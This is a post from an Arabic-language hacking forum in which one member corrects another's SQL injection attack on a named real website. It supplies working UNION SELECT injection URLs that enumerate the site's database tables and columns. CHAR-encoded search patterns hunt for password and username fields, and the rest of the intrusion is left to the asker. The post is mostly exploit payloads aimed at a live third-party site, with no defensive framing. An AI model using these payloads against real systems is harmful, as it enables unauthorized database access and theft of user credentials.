الموضوع: [مشكلة] مساعدة بخصوص حقن موقع
عرض مشاركة واحدة
قديم 11-19-2012, 09:09 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
googles
 
الصورة الرمزية googles
 

 
 
إحصائية العضو





googles غير متواجد حالياً

إرسال رسالة عبر MSN إلى googles

 

 

إحصائية الترشيح

عدد النقاط : 10
googles is on a distinguished road
افتراضي رد: maestro-23@hotmail.fr

ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :

كود PHP:
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(371129711511537)-- 
أنظر هذا هو الامر الصحيح :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 
اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 
وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية
تحياتي .